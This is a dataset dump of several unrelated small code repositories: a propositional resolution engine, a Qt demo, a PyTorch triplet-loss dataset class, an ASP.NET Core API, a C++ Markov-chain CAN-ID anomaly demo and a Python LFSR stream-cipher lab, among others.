branch_name stringclasses 149 values | text stringlengths 23 89.3M | directory_id stringlengths 40 40 | languages listlengths 1 19 | num_files int64 1 11.8k | repo_language stringclasses 38 values | repo_name stringlengths 6 114 | revision_id stringlengths 40 40 | snapshot_id stringlengths 40 40 |
|---|---|---|---|---|---|---|---|---|
refs/heads/master | <file_sep>import copy
# import collections.defaultdict
import itertools
inputFileObject = open("input.txt", "r")
outputFileObject = open("output.txt", "w")
operators = ['or', 'not']
queryNum = int(inputFileObject.readline().strip())
queryList = []
for i in range(queryNum):
query = inputFileObject.readline().strip()
query = query.replace(" ", "")
queryList.append(query)
print queryList
knowledgeBaseNum = int(inputFileObject.readline().strip())
kbList = []
for i in range(knowledgeBaseNum):
sentence = inputFileObject.readline().strip().replace(" ", "")
kbList.append(sentence)
print kbList
def negate(current_str):
if current_str[0] == '~':
current_str = current_str[1:]
else:
current_str = '~' + current_str
return current_str
def findPredicate(current_str):
temp = list(current_str)
# temp=current_str.split('(')
for j in range(len(temp)):
if temp[j] =='(':
temp1=temp[:j]
break
if temp1[0] == '~':
flag = 1
#print 'Predicate', temp1[1:]
return temp1[1:], flag
else:
flag = 0
#print 'Predicate', temp1[0:]
return temp1[0:], flag
def findArguments(current_predicate):
for i in range(len(current_predicate)):
if current_predicate[i] == '(':
current_predicate = current_predicate[i + 1:len(current_predicate) - 1]
break
args = current_predicate.split(',')
return args
def isCapitalAlphabet(c):
if (c >= 'A' and c <= 'Z'):
return True
return False
def isVar(c):
if isinstance(c, str) and len(c) == 1 and c.islower():
return True
else:
return False
def unification(args1, args2):
substitute = {}
count_args1 = 0
count_args2 = 0
for temp in args1:
if isVar(temp):
count_args1 += 1
for temp in args2:
if isVar(temp):
count_args2 += 1
# print count_args1,count_args2
if count_args1 == count_args2 and count_args1 == len(args1):
return substitute
for l1, l2 in zip(args1, args2):
if isVar(l1) and isCapitalAlphabet(l2):
substitute[l1] = l2
elif isVar(l2) and isCapitalAlphabet(l1):
substitute[l2] = l1
elif isCapitalAlphabet(l1) and isCapitalAlphabet(l2) and l1 == l2:
substitute[l1] = l2
elif isVar(l1) and isVar(l2):
substitute[l2] = l1
# elif isVar(l1) and isVar(l2):
# substitute[l1]=l2
return substitute
def add_query(str1, str2, each_predicate1, each_predicate2, unified_variables):
new_kb_query = ''
# print str1,str2
temp_list = str1 + str2
# print temp_list
for m in temp_list:
if m != each_predicate1 and m != each_predicate2:
new_kb_query += m + '|'
new_kb_query = new_kb_query[:-1]
flag = 0
ans = ''
# print unified_variables
new_kb_query = list(new_kb_query)
for i in range(len(new_kb_query)):
if new_kb_query[i] == '(':
flag = 1
elif new_kb_query[i] == ')':
flag = 0
if ans in unified_variables.keys() and isVar(ans):
new_kb_query[i - 1] = unified_variables[ans]
ans = ''
elif new_kb_query[i] == ',':
if ans in unified_variables.keys() and isVar(ans):
new_kb_query[i - 1] = unified_variables[ans]
ans = ''
elif flag == 1:
ans += new_kb_query[i]
new_kb_query = ''.join(new_kb_query)
# print new_kb_query
return new_kb_query
'''
for each_query in queryList:
query_prove=negate(each_query)
print 'negated query',query_prove
temp_query = query_prove
while(len(copy_kbList)):
copy_kbList = copy.deepcopy(kbList)
copy_kbList.append(temp_query)
for sentence in copy_kbList:
print sentence
split_sentence1 = temp_query.split('|')
split_sentence2 = sentence.split('|')
for each_predicate1,each_predicate2 in itertools.product(split_sentence1,split_sentence2):
predicate1, flag1 = findPredicate(each_predicate1)
predicate2,flag2=findPredicate(each_predicate2)
print predicate1,flag1
print predicate2,flag2
if predicate1==predicate2 and flag1!=flag2:
args1=findArguments(each_predicate1)
args2=findArguments(each_predicate2)
unified_variables=unification(args1,args2)
if len(unified_variables)!=0:
#print unified_variables
new_kb_query=add_query(split_sentence1,split_sentence2,each_predicate1,each_predicate2,unified_variables)
if new_kb_query=='':
print ' #### TRUE #####'
print new_kb_query
temp_query=new_kb_query
copy_kbList.append(new_kb_query)
copy_kbList.remove(sentence)
copy_kbList.remove(temp_query)
print copy_kbList
break
break
break
'''
def call_to_KB(kbList, kbList_index, query_prove):
temp_query = query_prove
'''
if temp_query not in kbList:
kbList.append(temp_query)
kbList_index.append(0)
'''
for sentence in kbList:
# print 'L'
if kbList_index[kbList.index(sentence)] != 1 and temp_query!=sentence:
print 'Taking sentence', temp_query, sentence
split_sentence1 = temp_query.split('|')
split_sentence2 = sentence.split('|')
for each_predicate1, each_predicate2 in itertools.product(split_sentence1, split_sentence2):
predicate1, flag1 = findPredicate(each_predicate1)
predicate2, flag2 = findPredicate(each_predicate2)
# print predicate1, flag1
# print predicate2, flag2
if predicate1 == predicate2 and flag1 != flag2:
'''Call to unification'''
args1 = findArguments(each_predicate1)
args2 = findArguments(each_predicate2)
unified_variables = unification(args1, args2)
if len(unified_variables) == len(args1):
new_kb_query = add_query(split_sentence1, split_sentence2, each_predicate1, each_predicate2,
unified_variables)
kbList_index[kbList.index(sentence)] = 1
if new_kb_query == '':
return True
#kbList_index[kbList.index(temp_query)] = 1
if call_to_KB(kbList, kbList_index, new_kb_query):
return True
else:
kbList_index[kbList.index(sentence)] = 0
print 'BackTrack , current temp query', temp_query
return False
query_prove = negate(queryList[0])
kbList_temp = copy.deepcopy(kbList)
kbList_temp.insert(0,query_prove)
kbList_index = [0] * len(kbList_temp)
kbList_index[kbList_temp.index(query_prove)]=1
#print call_to_KB(kbList_temp, kbList_index, query_prove)
#print kbList_temp,kbList_index
ans_found=0
for query_prove in kbList_temp:
print 'NOW RECURSION CALL'
if call_to_KB(kbList_temp, kbList_index, query_prove):
print True
ans_found=1
break
kbList_index[kbList_temp.index(query_prove)] = 0
print kbList_index
if ans_found==0:
print False
print kbList_temp,kbList_index
<file_sep># Expert_system_Inference_engine
Implemented a protocol for navigating through the rules and data in a knowledge system in order to solve the problem.
Used Backward chaining mode to determine what facts must be asserted so that the goals can be achieved.
Knowledge bases contains only the following defined operators:
NOT X
X OR Y
1. Each query will be a single literal of the form Predicate(Constant) or ~Predicate(Constant).
2. Variables are all single lowercase letters.
3. All predicates (such as Sibling) and constants (such as John) are case-sensitive alphabetical strings that
begin with an uppercase letter.
4. Each predicate takes at least one argument.
You can have look on homework_3.pdf for more detailed Explanation and examples.
| 0f0a02c311fafc660cae51a3455af2c6d85d7b0b | [
"Markdown",
"Python"
] | 2 | Python | harsh5296/Expert_system_Inference_engine | 5f1efe09f6ffe669853df5d970643c86b1bf46a1 | b5026160d163020c5f4edf3238fadec7ecc8638e |
refs/heads/master | <file_sep>#include "mainwindow.h"
#include "ui_mainwindow.h"
MainWindow::MainWindow(QWidget *parent)
: QMainWindow(parent)
, ui(new Ui::MainWindow)
{
ui->setupUi(this);
sWindow= new WindowMenu ();
connect(sWindow, &WindowMenu::firstWindow, this, &MainWindow::show);
}
MainWindow::~MainWindow()
{
delete ui;
}
void MainWindow::on_pushButton_clicked()
{
sWindow -> show ();
this -> close ();
}
<file_sep>#ifndef WINDOWMENU_H
#define WINDOWMENU_H
#include <QWidget>
QT_BEGIN_NAMESPACE
namespace Ui { class WindowMenu; }
QT_END_NAMESPACE
class WindowMenu : public QWidget
{
Q_OBJECT
signals:
void firstWindow();
public:
WindowMenu(QWidget *parent = nullptr);
~WindowMenu();
private:
Ui::WindowMenu *ui;
private slots:
void on_pushButton_clicked();
};
#endif // WINDOWMENU_H
<file_sep>#include "windowmenu.h"
#include "ui_windowmenu.h"
WindowMenu::WindowMenu(QWidget *parent):
QWidget(parent),
ui(new Ui::WindowMenu)
{
ui->setupUi(this);
}
WindowMenu::~WindowMenu()
{
delete ui;
}
void WindowMenu::on_pushButton_clicked()
{
this->close();
emit firstWindow();
}
| 67755f072d0c95c18c74541d2d52f542e58a65c1 | [
"C++"
] | 3 | C++ | Dima98772/OurProject_pr4 | 6129b33b7519a9054a030aa80e1d8f62d8cd85d9 | 5f5d5d349b61ba64fab26e91766e46e8fa248651 |
refs/heads/master | <file_sep>from torchvision import datasets
import os
import numpy as np
import random
import torch
class TripletFolder(datasets.ImageFolder):
def __init__(self, root, transform):
super(TripletFolder, self).__init__(root + '/satellite', transform)
# record the drone information
drone_path = []
drone_id = []
drone_root = root + '/drone/'
for folder_name in os.listdir(drone_root):
folder_root = drone_root + folder_name
if not os.path.isdir(folder_root):
continue
for file_name in os.listdir(folder_root):
drone_path.append(folder_root + '/' + file_name)
drone_id.append(int(folder_name))
self.drone_path = drone_path
self.drone_id = np.asarray(drone_id)
def _get_pos_sample(self, target, index):
pos_index = np.argwhere(self.drone_id == target)
rand = np.random.permutation(len(pos_index))
result_path = []
for i in range(4):
t = i%len(rand)
tmp_index = pos_index[rand[t]][0]
result_path.append(self.drone_path[tmp_index])
return result_path
def _get_neg_sample(self, target):
neg_index = np.argwhere(self.drone_id != target)
neg_index = neg_index.flatten()
rand = random.randint(0,len(neg_index)-1)
return self.drone_path[neg_index[rand]]
def __getitem__(self, index):
path, target = self.samples[index]
original_target = int(os.path.basename(os.path.dirname(path)))
# pos_path, neg_path
pos_path = self._get_pos_sample(original_target, index)
sample = self.loader(path)
pos0 = self.loader(pos_path[0])
pos1 = self.loader(pos_path[1])
pos2 = self.loader(pos_path[2])
pos3 = self.loader(pos_path[3])
if self.transform is not None:
sample = self.transform(sample)
pos0 = self.transform(pos0)
pos1 = self.transform(pos1)
pos2 = self.transform(pos2)
pos3 = self.transform(pos3)
if self.target_transform is not None:
target = self.target_transform(target)
c,h,w = pos0.shape
pos = torch.cat((pos0.view(1,c,h,w), pos1.view(1,c,h,w), pos2.view(1,c,h,w), pos3.view(1,c,h,w)), 0)
pos_target = target
return sample, target, pos, pos_target
| 2593f6271f0d673e99cc5b698b6d5c9351bae2cb | [
"Python"
] | 1 | Python | maomingyang/University1652-triplet-loss | a3e2d26b4cbacfe4b46ef3aff16aa096bca34684 | 1203119c6a5b6cb7adb90b1f0633a409114d1bfd |
refs/heads/master | <file_sep># ICS4U-Unit-1-01-Python
# <NAME>
Python test from IDEs on windows
<file_sep>#---------------------------------------#
#-- Created by: <NAME> --#
#-- Created on: Feb 8 2019 --#
#-- Created for: Unit 1-01 --#
#-- Course Code: ICS4U --#
#-- Teacher Name: <NAME> --#
#---------------------------------------#
print("Hello, World!") | 7a350da36bc655b729907d807b3ebe87ead4d85c | [
"Markdown",
"Python"
] | 2 | Markdown | AlirezaTeimoori/ICS4U-Unit-1-01-Python | 1d9feb328b5ef4c9f40df63b2ff0cedff7e75cd6 | 162d63d4b22056f47cc5b989b70f0b0001181dfa |
refs/heads/master | <file_sep>google-api-python-client==1.6.4
google-auth==1.1.1
google-auth-httplib2==0.0.2
requests==2.18.4
<file_sep>google-api-python-client==1.6.4
google-auth==1.1.1
google-auth-httplib2==0.0.2
google-cloud==0.27.0
<file_sep>Flask==0.12.2
google-api-python-client==1.6.4
google-auth==1.1.1
google-auth-httplib2==0.0.2
google-cloud-datastore==1.3.0
gunicorn==19.7.1
<file_sep>google-cloud-language==0.29.0
<file_sep>google-cloud-language==0.29.0
numpy==1.13.1
<file_sep>grpcio==1.6.0
google-auth==1.1.1
<file_sep>google-endpoints==2.3.1
google-endpoints-api-management==1.2.1
<file_sep>google-cloud-firestore==0.27.0
<file_sep>"# python_django_restapi"
<file_sep>from django.db import models
from restapi.models.base import BaseModel
from restapi.models.base import BaseReadonlyModelMixin
from restapi.models.choices import PUBLISHER_STATUS_APPROVED
from restapi.models.choices import PUBLISHER_STATUS_CHOICES
from restapi.models.managers import BaseManager
class PublisherManager(BaseManager):
pass
class Publisher(BaseReadonlyModelMixin, BaseModel):
publisher_id = models.AutoField(primary_key=True)
publisher = models.CharField(max_length=255)
status = models.CharField(max_length=10, choices=PUBLISHER_STATUS_CHOICES, default=PUBLISHER_STATUS_APPROVED)
objects = PublisherManager()
objects_raw = models.Manager()
def __unicode__(self):
return self.publisher
class Meta:
# managed=False
db_table = 'publisher'
app_label = 'restapi'
<file_sep># Cloud IoT Core Python HTTP example
This sample app publishes data to Cloud Pub/Sub using the HTTP bridge provided
as part of Google Cloud IoT Core. For detailed running instructions see the
[HTTP code samples
guide](https://cloud.google.com/iot/docs/protocol_bridge_guide).
# Setup
1. Use virtualenv to create a local Python environment.
```
virtualenv env && source env/bin/activate
```
1. Install the dependencies
```
pip install -r requirements.txt
```
# Running the Sample
The following snippet summarizes usage:
```
cloudiot_http_example.py [-h]
--project_id PROJECT_ID
--registry_id REGISTRY_ID
--device_id DEVICE_ID
--private_key_file PRIVATE_KEY_FILE
--algorithm {RS256,ES256}
--message_type={event,state}
[--cloud_region CLOUD_REGION]
[--ca_certs CA_CERTS]
[--num_messages NUM_MESSAGES]
```
For example, if your project ID is `blue-jet-123`, the following example shows
how you would execute using the configuration from the HTTP code samples guide:
```
python cloudiot_http_example.py \
--registry_id=my-registry \
--project_id=blue-jet-123 \
--device_id=my-python-device \
--message_type=event \
--algorithm=RS256 \
--private_key_file=../rsa_private.pem
```
<file_sep>google-api-python-client==1.6.4
google-auth==1.1.1
google-auth-httplib2==0.0.2
<file_sep>cryptography==2.0.3
pyjwt==1.5.3
requests==2.18.4
<file_sep># Parsing
pyparsing==2.2.0
pyyaml==3.11
# Deployment
setuptools==26.1.1
twine==1.8.1
# Documentation
sphinx_bootstrap_theme>=0.4.6<file_sep>google-api-python-client==1.6.4
google-auth-httplib2==0.0.2
google-auth==1.1.1
<file_sep>google-auth==1.1.1
google-auth-oauthlib==0.1.1
google-auth-httplib2==0.0.2
google-api-python-client==1.6.4
flask==0.12.2
requests==2.18.4
<file_sep>google-cloud-videointelligence==0.27.2
| f0883020dfb0286fed39941e1c994a6e0f1b68b1 | [
"Markdown",
"Python",
"Text"
] | 17 | Text | moonking211/python | 729d747877616b5c4a2d377d2c2182bb16248834 | f1ddc5ea045a1cb33dacd4789901eaf969500e94 |
refs/heads/master | <file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Mvc;
using Microsoft.EntityFrameworkCore;
using TestApi.Data;
using TestApi.Models;
using TestApi.Services;
namespace TestApi.Controllers
{
[Route("api/[controller]")]
[ApiController]
public class ValuesController : Controller
{
private AppDbContext _context;
public ValuesController(AppDbContext dbContext)
{
_context = dbContext;
}
// GET api/values
[HttpGet]
public IActionResult Get()
{
return Json(_context.Customers.Where(c => c.Id > 0));
}
// GET Products
[HttpGet]
[Route("Get_Product")]
public IActionResult Get_Product()
{
return Json(_context.Products.Where(p => p.Id > 0));
}
// GET api/values/5
[HttpGet("{id}")]
public async Task<IActionResult> Get(int id)
{
return Json(await _context.Customers.FindAsync(id));
}
// POST api/values
[HttpPost]
public async Task<IActionResult> Post(Customer customer)
{
if (!ModelState.IsValid)
{
return Json(customer);
}
// var pro = _context.Products.Where(c => c.Id == 1).Include(p => p.Customer);
// Task Paraller Library (TPL) with async / await
await _context.Customers.AddAsync(customer);
_context.SaveChanges();
return NoContent();
}
// POST api/values
[HttpPost]
[Route("Post_Product")]
public async Task<IActionResult> Post_Product(Product product)
{
if (!ModelState.IsValid)
{
return Json(product);
}
// var pro = _context.Products.Where(c => c.Id == 1).Include(p => p.Customer);
// Task Paraller Library (TPL) with async / await
await _context.Products.AddAsync(product);
await _context.SaveChangesAsync();
return NoContent();
}
// PUT api/values/5
[HttpPatch("{id}")]
public void Patch(Customer customer)
{
_context.Attach(customer);
_context.Entry(customer).State = EntityState.Modified;
_context.SaveChanges();
}
// DELETE api/values/5
[HttpDelete("{id}")]
public void Delete(int id)
{
var customer = _context.Customers.Find(id);
_context.Customers.Remove(customer);
_context.SaveChanges();
}
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using TestApi.Models;
namespace TestApi.Services
{
public class CustomerRepository
{
public List<Customer> Customers { get; set; } = new List<Customer>
{
new Customer
{
Id = 1,
Name = "Meet",
Age = 21
},
new Customer
{
Id = 2,
Name = "Heet",
Age = 25
}
};
public List<Product> Products { get; set; } = new List<Product> { };
public IEnumerable<Customer> Get()
{
return Customers;
}
public IEnumerable<Product> Get_Product()
{
return Products;
}
public Customer Get(int id)
{
return Customers.Find(c => c.Id == id);
}
public void Add(Customer customer)
{
Customers.Add(customer);
}
public void Delete(int id)
{
var customer = Customers.Find(c => c.Id == id);
Customers.Remove(customer);
}
}
}
| 81e96ecb2de0a4cec0630ffd1eb3f7b3d84a3083 | [
"C#"
] | 2 | C# | meetjanani/TestApi | d4079f34ef2129a26cf0e90275a0e5e693ca4d05 | 8e0843d2187d5ed394645b52ca9586af1c2d5971 |
refs/heads/master | <repo_name>ospiridonovn/unike<file_sep>/js/hide.js
function showHiddenText(type, b1, b2){
currentDiv = document.getElementById(type);
openbutton = document.getElementById(b1);
closebutton = document.getElementById(b2);
if (currentDiv.style.display == 'block') {
currentDiv.style.display = 'none';
openbutton.style.display = 'block';
closebutton.style.display = 'none';
} else {
currentDiv.style.display = 'block';
openbutton.style.display = 'none';
closebutton.style.display = 'block';
}
} | 0815445043c4b4e30a61d6c1f63158a4d7838788 | [
"JavaScript"
] | 1 | JavaScript | ospiridonovn/unike | 480a580eb24bef98208ade63fd727fd4b43aa025 | 2644bd9187c71fc43a4762913f109d097c0e0b99 |
refs/heads/main | <file_sep>#include <iostream>
#include "MarkovChain.h"
//=========================================================================================
// An example of 3 nodes, 0x10 and 0x12 transmit each 10ms, and 0x14 transmits every 20ms.|
//=========================================================================================
// 0x10 ---'a' === |
// 0x12 ---'b' |- " Mapping of IDs in characters " |
// 0x14 ---'c' === |
//=========================================================================================
// Afterwards, in the window of 40ms, all possible transmission sequences are created|
// in the defined trainingSets, and given in the Markov Chain for evaluation of the |
// probabilities each time. |
//=========================================================================================
using namespace std;
MarkovChain chain;
//creates a sequence
void create( char * pos, char a, char b, char c, char d, char e, char zero)
{
pos[0] = a;
pos[1] = b;
pos[2] = c;
pos[3] = d;
pos[4] = e;
pos[5] = zero;
}
//character to ID
int map(char a)
{
switch(a) {
case 'a':
return 10;
case 'b':
return 12;
case 'c':
return 14;
}
}
//ID to character
char revmap(int a)
{
switch(a) {
case 10:
return 'a';
case 12:
return 'b';
case 14:
return 'c';
default:
return 'x'; // could be a sign for alert.
}
}
//checks if a valid ID.
int valid( int id)
{
if( (id == 10) || (id == 12) || (id==14) )
return 1;
return 0;
}
// Id to index 0-2
int IDtoIndex(int id)
{
switch(id) {
case 10:
return 0;
case 12:
return 1;
case 14:
return 2;
//no default, since is only called when there is a valid ID.
}
}
int main(void)
{
char **trainingSet;
int possibilityArray[3];
int IDS[3] = { 10, 12, 14};
trainingSet = (char **) malloc(12*sizeof(char *));
for(int i = 0; i < 3; i++)
possibilityArray[i] = 0;
cout << "Possibilities array initialized" << endl;
for(int i = 0; i < 12; i++)
trainingSet[i] = (char *) malloc(6*sizeof(char));
// trainingSets creation.
create(trainingSet[0], 'a', 'b', 'a', 'b', 'c', '\0');
create(trainingSet[1], 'a', 'b', 'a', 'c', 'b', '\0');
create(trainingSet[2], 'a', 'b', 'b', 'a', 'c', '\0');
create(trainingSet[3], 'a', 'b', 'b', 'c', 'a', '\0');
create(trainingSet[4], 'a', 'b', 'c', 'a', 'b', '\0');
create(trainingSet[5], 'a', 'b', 'c', 'b', 'a', '\0');
create(trainingSet[6], 'b', 'a', 'a', 'b', 'c', '\0');
create(trainingSet[7], 'b', 'a', 'a', 'c', 'b', '\0');
create(trainingSet[8], 'b', 'a', 'b', 'a', 'c', '\0');
create(trainingSet[9], 'b', 'a', 'b', 'c', 'a', '\0');
create(trainingSet[10], 'b', 'a', 'c', 'a', 'b', '\0');
create(trainingSet[11], 'b', 'a', 'c', 'b', 'a', '\0');
cout << "Training Set " << endl;
//printing the sequences.
for(int i = 0; i < 12; i++) {
cout << "Seq" << i << " " << endl;
cout << map(trainingSet[i][0]) << " " ;
cout << map(trainingSet[i][1]) << " " ;
cout << map(trainingSet[i][2]) << " " ;
cout << map(trainingSet[i][3]) << " " ;
cout << map(trainingSet[i][4]) << " " << endl;
}
// to get probability results every 5 messages on the bus.
int window_index = 0;
int window = 5;
char trace[5]; // used to hold IDs within' a WINDOW
char elements[] = { 'a', 'b', 'c'};
int test = 99;
int isValid;
int change_flag;
cout << "Enter valid ID (10, 12, 14) to see\nthe probability of the next shown ID on the bus.\nEnter 0 to exit" << endl;
while(test != 0) {
change_flag = 0;
cout << "Enter ID: " << endl;
cin >> test;
trace[window_index++] = revmap(test);
if( valid(test) ) {
if( possibilityArray[IDtoIndex(test)] ) {
cout << "\t\tALERT ::: ID had show-up possibility 0." << endl;
possibilityArray[IDtoIndex(test)] = 0;
}
double *probs = chain.getNextTransitions(revmap(test), elements, 3, trainingSet, 12);
cout << "Probability of IDs appearing next: " << endl;
for(int i = 0; i < 3; i++) {
cout << map(elements[i]) << " : " << probs[i] << endl;
// remember this in next reception, to raise ALERT because
// probability will be zero to see this specific ID.
if(probs[i] == 0.0) {
possibilityArray[i] = 1;
change_flag++;
}
}
} else {
cout << "\t\tALERT ::: invalid ID." << endl;
}
if(!change_flag)
for(int i = 0; i < 3; i++)
possibilityArray[i] = 0;
if(window_index == window) {
double res;
cout << "Getting recent window Sequence probability" << endl;
res = chain.getSequenceProbability(trace, window, elements, 3, trainingSet, 12);
cout << "Probability of recent Window: " << res << endl;
window_index = 0;
}
}
return (0);
}
<file_sep>all:
g++ -c MarkovChain.cpp
g++ -o a.out main.cpp MarkovChain.o
clean:
rm MarkovChain.o a.out
<file_sep>/*
MarkovChain.h - Library for using Markov Chains in Arduino
*/
#ifndef MarkovChain_h
#define MarkovChain_h
class MarkovChain
{
public:
int* getFirstStates(char* elements, int numOfElements, char** sequences, int rows);
int counterTransitionsInSequence(char expectedFrom, char expectedTo, char sequence [], int numOfElements);
int countElementsInSequence(char * sequence);
int** createTransitionMatrix(char elements [], int numOfElements, char ** sequences, int numSequences);
int* countRowsTotals(int** transitionMatrix, int numOfElements);
double** createTransitionProbabilityMatrix(int* rowsTotals, int** transitionMatrix, int numOfElements);
double * calculateFirstStatesProbabilities (char* elements, int numOfElements, char** sequences, int numOfSecuences);
//******************************************************************************************
//******* Only the following functions are needed to be called to use Markov Chains ********
//******************************************************************************************
double* getNextTransitions(char element, char* elements, int numOfElements, char ** sequences, int numSequences );
double getSequenceProbability(char* sequence, int seqElementsNum, char* elements, int numOfElements, char ** sequences, int numSequences);
};
#endif
<file_sep>/*
MarkovChain.cpp - Library for using Markov Chains in Arduino.
*/
#include "MarkovChain.h"
#include <stdlib.h>
int* MarkovChain::getFirstStates(char* elements, int numOfElements, char** sequences, int rows) {
int* firstStates = (int *)malloc(numOfElements*sizeof(int));
for(int iElement = 0; iElement < numOfElements; iElement++) {
int count = 0;
char element = elements[iElement];
for(int iSequence = 0; iSequence < rows; iSequence++) {
char firstElement = sequences[iSequence][0];
if (firstElement == element) {
count++;
}
}
firstStates[iElement] = count;
}
return firstStates;
}
int MarkovChain::counterTransitionsInSequence(char expectedFrom, char expectedTo, char sequence [], int numOfElements) {
int count = 0;
for (int i = 0; i < numOfElements; i++) {
char actualFrom = sequence[i];
char actualTo = sequence[i + 1];
if((actualFrom == expectedFrom) && (actualTo == expectedTo))
count++;
}
return count;
}
int MarkovChain::countElementsInSequence(char * sequence) {
int count = -1;
char current = '1';
while(current != '\0') {
count++;
current = sequence[count];
}
return count;
}
int** MarkovChain::createTransitionMatrix(char elements [], int numOfElements, char ** sequences, int numSequences) {
//The number of rows and columns of the transition matrix always equals
//to the number of distinc elements
int** matrix;
matrix = (int **) malloc(numOfElements*sizeof(int *));
for(int i = 0; i < numOfElements; i++)
matrix[i] = (int *) malloc(numOfElements*sizeof(int));
int row = 0;
int col = 0;
int count = 0;
for(int iFrom = 0; iFrom < numOfElements; iFrom++) {
for (int iTo = 0; iTo < numOfElements; iTo++) {
for(int iSequences = 0; iSequences < numSequences; iSequences++) {
char from = elements[iFrom];
char to = elements[iTo];
char* sequence = sequences[iSequences];
int num = countElementsInSequence(sequence);
count = count + counterTransitionsInSequence(from, to, sequence,num);
}
matrix[row][col] = count;
count = 0;
col++;
}
row++;
col = 0;
}
return matrix;
}
int* MarkovChain::countRowsTotals(int** transitionMatrix, int numOfElements) {
int* totals = (int *)malloc(numOfElements*sizeof(int));
for(int i = 0; i < numOfElements; ++i) {
totals[i] = 0;
}
for(int i = 0; i < numOfElements; ++i) {
for (int j = 0; j < numOfElements; ++j) {
totals[i] = totals[i] + transitionMatrix[i][j];
}
}
return totals;
}
double** MarkovChain::createTransitionProbabilityMatrix(int* rowsTotals, int** transitionMatrix, int numOfElements) {
double** probMatrix;
probMatrix = (double **) malloc(numOfElements*sizeof(double *));
for(int i = 0; i < numOfElements; i++)
probMatrix[i] = (double *) malloc(numOfElements*sizeof(double));
for (int i = 0; i < numOfElements; i++) {
for (int j = 0; j < numOfElements; j++) {
probMatrix[i][j] = (double)transitionMatrix[i][j] / (double)rowsTotals[i];
}
}
return probMatrix;
}
//the returning array has the state probabilities in the same order as the "elements" array
double * MarkovChain::calculateFirstStatesProbabilities (char* elements, int numOfElements, char** sequences, int numOfSecuences) {
double * firstStateProbs = (double *)malloc(numOfElements*sizeof(double));
int* firstStates = getFirstStates(elements, numOfElements, sequences, numOfSecuences);
int total = 0;
for(int i = 0; i < numOfElements; i++) {
total = total + firstStates[i];
}
for(int i = 0; i < numOfElements; i++) {
firstStateProbs[i] = (double)firstStates[i] / (double)total;
}
return firstStateProbs;
}
int getElementPosition(char element, char* elements, int numOfElements) {
for (int i = 0; i < numOfElements; i++) {
if (element == elements[i])
return i;
}
}
//******************************************************************************************
//******* Only the following functions are needed to be called to use Markov Chains ********
//******************************************************************************************
/*
* Returns the probabilities for the next states. The probabilities appear in the same order
* that appear in "elements"
*/
double* MarkovChain::getNextTransitions(char element, char* elements, int numOfElements, char ** sequences, int numSequences ) {
double* probabilities = (double *)malloc(numOfElements*sizeof(double));
int row = -1;
for (int i = 0; i < numOfElements; i++) {
if (elements[i] == element && row == -1) {
row = i;
}
}
if (row == -1) {
return NULL;
}
int ** transitionMatrix = createTransitionMatrix(elements, numOfElements, sequences, numSequences);;
int * rowsTotals = countRowsTotals(transitionMatrix, numOfElements);
double ** transitionProbabilityMatrix = createTransitionProbabilityMatrix(rowsTotals, transitionMatrix, numOfElements);
for (int i = 0; i < numOfElements; i++) {
double prob = transitionProbabilityMatrix[row][i];
probabilities[i] = prob;
}
for(int i = 0; i < numOfElements; i++)
free(transitionMatrix[i]);
free(transitionMatrix);
free(rowsTotals);
for(int i = 0; i < numOfElements; i++)
free(transitionProbabilityMatrix[i]);
free(transitionProbabilityMatrix);
return probabilities;
}
/*
* Returns the ocurrence probability of a given sequence
*/
double MarkovChain::getSequenceProbability(char* sequence, int seqElementsNum, char* elements, int numOfElements, char ** sequences, int numSequences) {
double probability = 1.0;
int ** transitionMatrix = createTransitionMatrix(elements, numOfElements, sequences, numSequences);;
int * rowsTotals = countRowsTotals(transitionMatrix, numOfElements);
double **transitionProbabilityMatrix = createTransitionProbabilityMatrix(rowsTotals, transitionMatrix, numOfElements);
double * firstStateProbabilities = calculateFirstStatesProbabilities (elements, numOfElements, sequences, numSequences);
for (int i = 0; i < seqElementsNum-1; i++) {
int row = getElementPosition(sequence[i], elements, numOfElements);
int col = getElementPosition(sequence[i+1], elements, numOfElements);
probability = probability * transitionProbabilityMatrix[row][col];
}
int firstElementPos = getElementPosition(sequence[0], elements, numOfElements);
probability = firstStateProbabilities[firstElementPos] * probability;
for(int i = 0; i < numOfElements; i++)
free(transitionMatrix[i]);
free(transitionMatrix);
free(rowsTotals);
for(int i = 0; i < numOfElements; i++)
free(transitionProbabilityMatrix[i]);
free(transitionProbabilityMatrix);
free (firstStateProbabilities);
return probability;
}
<file_sep># Markov-chain-test | 7c9816e0243827df6e1b2681e70e7b8e020d3689 | [
"Markdown",
"Makefile",
"C++"
] | 5 | C++ | NikosMouzakitis/Markov-chain-test | eaaf47de39c9128e6049dc23358f11c477b4e7d7 | b93d14dde44178c2c07b87c1468573d8493328d0 |
refs/heads/master | <repo_name>D0ub1ePieR/Pseudo-randomSequenceGenerationByLsrf<file_sep>/stream-cipher.py
from mlist import lfsr_jk
from info import get_info
from B_M import solve
def output(list):
nflag=0
sflag=0
for element in list:
print(element,end="")
if sflag==7:
print(" ",end="")
sflag=0
nflag=nflag+1
else:
sflag=sflag+1
if nflag==8:
print()
nflag=0
print()
def outpoly(result):
print("线性综合解为: f(x)=1",end="")
result[0]=int(result[0])%2
for i in range(1,9):
result[i]=int(result[i])%2
if result[i]>0:
if i==1:
print("+x",end="")
else:
print("+x^",end="")
print(i,end="")
print("\n系数为:",list(reversed(result[:9])))
def main(): #主函数 总控程序
#获取信息
information=get_info()
st_num=information.re_st_num()
poly=information.re_poly()
print()
print("当前学号为: ",st_num)
print("当前使用的本原多项式系数为: ",poly)
#md5加密并载入lfsr中
proc=lfsr_jk(st_num,poly)
proc.run()
print("当前md5的hash值为: ",proc.get_md5())
print("当前输出测试序列长度: ",proc.get_total())
print("当前list1序列为:"),output(proc.get_list1())
print("list1一个周期的序列为:"),output(proc.get_list1()[:255])
print("当前list2序列为:"),output(proc.get_list2())
print("list2一个周期的序列为:"),output(proc.get_list2()[:255])
print("当前qlist序列为:"),output(proc.get_qlist()[1:])
#利用B-M算法求出m序列的线性综合解 得到所使用的本原多项式
for i in range(512):
if proc.get_list1()[i]==0:
break
re=solve(proc.get_list1()[i:i+16])
#re=solve([0,1,0,0,1,0,1,1,1,0,1,1,0,0,0,0])
re.figure_out()
result=re.get_result()
outpoly(result)
main()
<file_sep>/README.md
# Pseudo-randomSequenceGenerationByLsrf
通过8位线性移位寄存器伪随机序列生成
---Cryptography lab
# info
stream-cipher.py为主程序
info.py中获取需要运算的基本信息
